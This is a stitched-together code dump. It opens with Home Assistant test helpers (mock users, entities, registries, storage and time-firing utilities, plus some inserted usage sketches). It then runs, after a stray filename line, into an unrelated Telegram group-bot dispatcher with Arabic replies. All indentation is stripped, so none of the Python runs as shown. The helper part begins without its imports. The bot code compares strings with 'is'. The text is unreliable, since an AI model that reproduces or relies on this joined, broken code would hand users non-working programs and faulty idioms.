CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
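# Editorial usage sketch (not part of the original helpers): how an older-style
# synchronous test typically drives the harness above.
def _example_sync_harness():
    """Start and stop a test Home Assistant instance (editorial sketch)."""
    hass = get_test_home_assistant()
    hass.start()
    try:
        pass  # exercise synchronous APIs such as hass.states.set / hass.services.call
    finally:
        hass.stop()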
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
    matchlist = sorted(list(files_dict.keys()), key=len, reverse=True) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
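# Editorial usage sketch (hypothetical file name and YAML payload): any load_yaml
# call for a path ending in "configuration.yaml" receives the fake content below.
def _example_patch_yaml_files():
    """Illustrate patch_yaml_files (editorial sketch, not used by the suite)."""
    with patch_yaml_files({"configuration.yaml": "light:\n  platform: demo\n"}):
        pass  # run code under test that loads YAML via homeassistant.util.yaml.loader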
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count. Optional; it can usually be determined
      automatically.
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
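# Editorial usage sketch (hypothetical storage key and payload), following the
# {'key': {'version': version, 'data': data}} shape described in the docstring above.
def _example_mock_storage():
    """Illustrate mock_storage (editorial sketch, not used by the test suite)."""
    seed = {"my_integration.config": {"version": 1, "data": {"enabled": True}}}
    with mock_storage(seed) as stored:
        # Exercise code that reads/writes homeassistant.helpers.storage.Store here;
        # anything written is mirrored into `stored`, keyed by Store.key.
        assert "my_integration.config" in stored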
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
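# Editorial usage sketch: collect events of one type fired during a test.
# EVENT_STATE_CHANGED is already imported at the top of this module.
def _example_capture_events(hass):
    """Illustrate async_capture_events (editorial sketch, not used by the suite)."""
    events = async_capture_events(hass, EVENT_STATE_CHANGED)
    # ... drive the code under test, then assert on the captured events ...
    return events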
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
msg.py
|
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo,IDrank,GPranks
from utlis.send import send_msg, BYusers, sendM,Glang,GetLink
from handlers.delete import delete
from utlis.tg import Bot, Ckuser
from handlers.ranks import ranks
from handlers.locks import locks
from handlers.gpcmd import gpcmd
from handlers.sudo import sudo
from handlers.all import allGP
from utlis.tg import Bot,Del24
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re , json,datetime,importlib
def updateHandlers(client, message,redis):
if redis.get("{}Nbot:bigM".format(BOT_ID)):
return False
type = message.chat.type
try:
userID = message.from_user.id
chatID = message.chat.id
except Exception as e:
return 0
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
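    # Dispatch overview (editorial note): depending on the chat type, whether the
    # group is activated in redis, and the sender's rank, the update is handed off
    # to the handler modules (allGP, sudo, ranks, locks, gpcmd, delete) on daemon threads.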
if (type is "supergroup" or type is "group") and message.outgoing != True:
userID = message.from_user.id
chatID = message.chat.id
rank = isrank(redis,userID,chatID)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
text = message.text
title = message.chat.title
if text and group is False:
if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"):
if text == c.add:
if redis.get("{}Nbot:autoaddbotN".format(BOT_ID)):
auN = int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID)))
else:
auN = 1
                    if auN >= Bot("getChatMembersCount",{"chat_id":chatID})["result"] and not (rank == "sudo" or rank == "sudos"):
Bot("sendMessage",{"chat_id":chatID,"text":r.Toolow.format((int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID))) or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
return False
GetME = Bot("getChatMember",{"chat_id":chatID,"user_id":BOT_ID})["result"]
if (not GetME["can_change_info"] or not GetME["can_delete_messages"] or not GetME["can_invite_users"] or not GetME["can_restrict_members"] or not GetME["can_pin_messages"] or not GetME["can_promote_members"]):
Bot("sendMessage",{"chat_id":chatID,"text":r.GiveMEall,"reply_to_message_id":message.message_id,"parse_mode":"html"})
return False
if text == c.add and not redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message):
locksarray = {'Llink','Llongtext','Lmarkdown','Linline','Lfiles','Lcontact','Lbots','Lfwd','Lnote'}
for lock in locksarray:
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
ads = Bot("getChatAdministrators",{"chat_id":chatID})
for ad in ads['result']:
userId = ad["user"]["id"]
userFn = ad["user"]["first_name"]
if ad['status'] == "administrator" and int(userId) != int(BOT_ID):
setrank(redis,"admin",userId,chatID,"array")
if ad['status'] == "creator":
setrank(redis,"malk",userId,chatID,"one")
add = redis.sadd("{}Nbot:groups".format(BOT_ID),chatID)
Bot("exportChatInviteLink",{"chat_id":chatID})
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
sendTO = (redis.get("{}Nbot:sudogp".format(BOT_ID)) or SUDO)
get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "https://t.me/zx_xx")
kb = InlineKeyboardMarkup([[InlineKeyboardButton("الرابط 🖇", url=get)]])
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,message.from_user.first_name)
Bot("sendMessage",{"chat_id":sendTO,"text":f"تم تفعيل مجموعه جديدة ℹ️\nاسم المجموعه : {title}\nايدي المجموعه : {chatID}\nالمنشئ : {BY}\n⎯ ⎯ ⎯ ⎯","parse_mode":"html","reply_markup":kb})
elif text == c.add and redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message):
redis.sadd("{}Nbot:groups".format(BOT_ID),chatID)
redis.srem("{}Nbot:disabledgroups".format(BOT_ID),chatID)
redis.hdel("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID)
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd2.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text == c.disabl and Ckuser(message):
Bot("sendMessage",{"chat_id":chatID,"text":r.disabled.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text and group is True:
if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"):
if text == c.add and Ckuser(message):
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadded.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text == c.disabl and Ckuser(message):
redis.srem("{}Nbot:groups".format(BOT_ID),chatID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),chatID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID,str(NextDay_Date))
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.disabl.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if group is True:
t = threading.Thread(target=allGP,args=(client, message,redis))
t.daemon = True
t.start()
if text and group is True:
x = redis.smembers("{}Nbot:{}:TXoeders".format(BOT_ID,chatID))
for x in x:
x = x.split("=")
if re.search(f"^{x[0]}$", text) or re.search(f"^{x[0]} (.*)$", text):
text = text.replace(x[0], x[1])
message.text = text
if (rank is "sudo" or rank is "sudos" or rank is "asudo") and group is True:
t = threading.Thread(target=sudo,args=(client, message,redis))
t.daemon = True
t.start()
if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner") and group is True:
t = threading.Thread(target=ranks,args=(client, message,redis))
t.daemon = True
t.start()
